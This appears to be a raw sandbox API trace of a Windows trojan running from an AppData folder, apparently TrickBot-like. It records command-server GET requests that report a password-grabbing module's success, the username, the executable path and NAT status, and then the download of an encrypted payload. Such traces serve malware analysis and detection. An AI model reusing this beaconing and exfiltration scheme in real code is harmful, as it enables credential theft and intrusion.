	[0200.065] CryptBinaryToStringW (in: pbBinary=0x2425d0, cbBinary=0x7, dwFlags=0x1, pszString=0x0, pcchString=0x128ab0 | out: pszString=0x0, pcchString=0x128ab0) returned 1
	[0200.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2306578
	[0200.065] CryptBinaryToStringW (in: pbBinary=0x2425d0, cbBinary=0x7, dwFlags=0x80000001, pszString=0x2306578, pcchString=0x128ab0 | out: pszString="U3VjY2Vzcw==\n", pcchString=0x128ab0) returned 1
	[0200.065] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0200.065] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0200.065] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/63/pwgrab/sTart/U3VjY2Vzcw==//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0200.065] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128ac4, dwBufferLength=0x4) returned 1
	[0200.066] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0200.308] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0200.308] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128ab4, lpdwBufferLength=0x128ab0, lpdwIndex=0x0 | out: lpBuffer=0x128ab4*, lpdwBufferLength=0x128ab0*=0x4, lpdwIndex=0x0) returned 1
	[0200.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2306578) returned 1
	[0200.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad360) returned 1
	[0200.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x263898) returned 1
	[0200.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2e8) returned 1
	[0200.308] GetUserNameW (in: lpBuffer=0x129228, pcbBuffer=0x1294f4 | out: lpBuffer="SYSTEM", pcbBuffer=0x1294f4) returned 1
	[0200.308] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0200.308] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x1e4538
	[0200.309] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0200.309] UrlEscapeW (in: pszUrl="user", pszEscaped=0x2311000, pcchEscaped=0x1289ac, dwFlags=0x0 | out: pszEscaped="user", pcchEscaped=0x1289ac) returned 0x0
	[0200.309] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0200.309] UrlEscapeW (in: pszUrl="SYSTEM", pszEscaped=0x2311108, pcchEscaped=0x1289ac, dwFlags=0x0 | out: pszEscaped="SYSTEM", pcchEscaped=0x1289ac) returned 0x0
	[0200.309] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x800) returned 0x22c8cc0
	[0200.309] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0200.309] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0200.309] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/14/user/SYSTEM/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0200.309] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x1289b8, dwBufferLength=0x4) returned 1
	[0200.309] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0200.791] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0200.792] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x1289a8, lpdwBufferLength=0x1289a4, lpdwIndex=0x0 | out: lpBuffer=0x1289a8*, lpdwBufferLength=0x1289a4*=0x4, lpdwIndex=0x0) returned 1
	[0200.792] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8cc0) returned 1
	[0200.792] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0200.792] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0200.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x110) returned 0x273688
	[0200.792] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x273688, nSize=0x104 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0200.792] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1e4538) returned 1
	[0200.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x1e4538
	[0200.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0200.792] UrlEscapeW (in: pszUrl="path", pszEscaped=0x2311108, pcchEscaped=0x128bb0, dwFlags=0x0 | out: pszEscaped="path", pcchEscaped=0x128bb0) returned 0x0
	[0200.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0200.792] UrlEscapeW (in: pszUrl="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe", pszEscaped=0x2311000, pcchEscaped=0x128bb0, dwFlags=0x0 | out: pszEscaped="C:%5CUsers%5C2XC7u663GxWc%5CAppData%5CRoaming%5Cchromedata%5Ctadiapce.exe", pcchEscaped=0x128bb0) returned 0x0
	[0200.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x800) returned 0x22c8cc0
	[0200.792] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0200.792] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0200.792] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/14/path/C:%5CUsers%5C2XC7u663GxWc%5CAppData%5CRoaming%5Cchromedata%5Ctadiapce.exe/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0200.792] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bbc, dwBufferLength=0x4) returned 1
	[0200.792] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0201.079] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0201.079] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bac, lpdwBufferLength=0x128ba8, lpdwIndex=0x0 | out: lpBuffer=0x128bac*, lpdwBufferLength=0x128ba8*=0x4, lpdwIndex=0x0) returned 1
	[0201.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8cc0) returned 1
	[0201.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0201.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0201.079] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x273688) returned 1
	[0201.080] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x129268 | out: lpWSAData=0x129268) returned 0
	[0201.080] gethostname (in: name=0x1293f8, namelen=255 | out: name="ZgW5tdPu") returned 0
	[0201.107] getaddrinfo (in: pNodeName="ZgW5tdPu", pServiceName=0x0, pHints=0x0, ppResult=0x1294f8 | out: ppResult=0x1294f8*=0x16567d0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x1656720*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="fe80:0000:0000:0000:9594:91b6:d807:49d3", sin6_scope_id=0xb), ai_next=0x1656748*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x16565a0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.251"), ai_next=0x0))) returned 0
	[0201.109] FreeAddrInfoW (pAddrInfo=0x16567d0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname=0x0, ai_addr=0x1656720*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="fe80:0000:0000:0000:9594:91b6:d807:49d3", sin6_scope_id=0xb), ai_next=0x1656748*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x16565a0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.251"), ai_next=0x0))) 
	[0201.109] WSACleanup () returned 0
	[0201.109] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1e4538) returned 1
	[0201.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0201.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311000
	[0201.109] UrlEscapeW (in: pszUrl="NAT status", pszEscaped=0x2311000, pcchEscaped=0x128c84, dwFlags=0x0 | out: pszEscaped="NAT%20status", pcchEscaped=0x128c84) returned 0x0
	[0201.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311108
	[0201.109] UrlEscapeW (in: pszUrl="client is behind NAT", pszEscaped=0x2311108, pcchEscaped=0x128c84, dwFlags=0x0 | out: pszEscaped="client%20is%20behind%20NAT", pcchEscaped=0x128c84) returned 0x0
	[0201.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x800) returned 0x22c8cc0
	[0201.109] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0201.109] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0201.109] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/14/NAT%20status/client%20is%20behind%20NAT/0/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0201.109] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128c90, dwBufferLength=0x4) returned 1
	[0201.109] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0201.364] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0201.364] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128c80, lpdwBufferLength=0x128c7c, lpdwIndex=0x0 | out: lpBuffer=0x128c80*, lpdwBufferLength=0x128c7c*=0x4, lpdwIndex=0x0) returned 1
	[0201.364] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8cc0) returned 1
	[0201.364] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311000) returned 1
	[0201.364] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311108) returned 1
	[0201.364] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x613e84e0, dwHighDateTime=0x1d50a6a)) 
	[0201.364] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x110) returned 0x273688
	[0201.364] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x273688, nSize=0x104 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0201.365] GetFileAttributesW (lpFileName="ver.txt" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\ver.txt")) returned 0xffffffff
	[0201.365] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x273688) returned 1
	[0201.365] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5b60) returned 1
	[0201.365] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x1e4538
	[0201.366] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0201.366] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0201.366] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/23/1000415/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0201.366] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128ba4, dwBufferLength=0x4) returned 1
	[0201.366] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0201.685] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0201.685] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128b94, lpdwBufferLength=0x128b90, lpdwIndex=0x0 | out: lpBuffer=0x128b94*, lpdwBufferLength=0x128b90*=0x4, lpdwIndex=0x0) returned 1
	[0201.685] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128b98 | out: lpdwNumberOfBytesAvailable=0x128b98*=0x748) returned 1
	[0201.685] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x750) returned 0x22eacc8
	[0201.685] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22eacc8, dwNumberOfBytesToRead=0x748, lpdwNumberOfBytesRead=0x128b90 | out: lpBuffer=0x22eacc8*, lpdwNumberOfBytesRead=0x128b90*=0x748) returned 1
	[0201.685] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128b98 | out: lpdwNumberOfBytesAvailable=0x128b98*=0x0) returned 1
	[0201.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22eacc8, cbMultiByte=1864, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1864
	[0201.686] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xea0) returned 0x22c8cc0
	[0201.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22eacc8, cbMultiByte=1864, lpWideCharStr=0x22c8cc0, cchWideChar=1864 | out: lpWideCharStr="/23/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ") returned 1864
	[0201.686] StrStrIW (lpFirst="/23/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ", lpSrch="/") returned="/23/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ"
	[0201.686] StrStrIW (lpFirst="23/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ", lpSrch="/") returned="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ"
	[0201.686] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff690
	[0201.686] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff6a8
	[0201.686] lstrcpynW (in: lpString1=0x22ff6a8, lpString2="23/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ", iMaxLength=3 | out: lpString1="23") returned="23"
	[0201.686] StrStrIW (lpFirst="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ", lpSrch="/") returned="/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ"
	[0201.686] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff690, Size=0x10) returned 0x22ff6c0
	[0201.686] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff690
	[0201.686] lstrcpynW (in: lpString1=0x22ff690, lpString2="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ", iMaxLength=7 | out: lpString1="tot478") returned="tot478"
	[0201.686] StrStrIW (lpFirst="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ", lpSrch="/") returned="\x2f\x31\x30\x30\x30\x34\x31\x37\x2f\x31\x37\x37\x36\x2f\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3"
	[0201.687] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff6c0, Size=0x10) returned 0x22ff6d8
	[0201.687] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x22c7d50
	[0201.687] lstrcpynW (in: lpString1=0x22c7d50, lpString2="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1000417/1776/\r\nY½”\x1c\x13Dn¯“\n\x9d¥ÌŽÝe§l\x13oå¹;®zbÒµ\x13yØú«¢\x04…(–•w($%'‹\x7fÛô€è”™ç7Ñ)!B­?v\x04›}–Þ­‡çHx[\x1b.yÂ\x07èxSK¥‹Ð\x18\x15öj\\ŽÃ", iMaxLength=50 | out: lpString1="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611"
	[0201.687] StrStrIW (lpFirst="\x31\x30\x30\x30\x34\x31\x37\x2f\x31\x37\x37\x36\x2f\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3", lpSrch="/") returned="\x2f\x31\x37\x37\x36\x2f\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3"
	[0201.687] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff6d8, Size=0x10) returned 0x22ff6c0
	[0201.687] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff6d8
	[0201.687] lstrcpynW (in: lpString1=0x22ff6d8, lpString2="\x31\x30\x30\x30\x34\x31\x37\x2f\x31\x37\x37\x36\x2f\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3", iMaxLength=8 | out: lpString1="1000417") returned="1000417"
	[0201.687] StrStrIW (lpFirst="\x31\x37\x37\x36\x2f\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3", lpSrch="/") returned="\x2f\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3"
	[0201.687] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff6c0, Size=0x20) returned 0x2693490
	[0201.688] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff6c0
	[0201.688] lstrcpynW (in: lpString1=0x22ff6c0, lpString2="\x31\x37\x37\x36\x2f\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3", iMaxLength=5 | out: lpString1="1776") returned="1776"
	[0201.688] StrStrIW (lpFirst="\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3", lpSrch="/") returned 0x0
	[0201.690] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2693490, Size=0x20) returned 0x26934b8
	[0201.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xc0) returned 0x22ac2e0
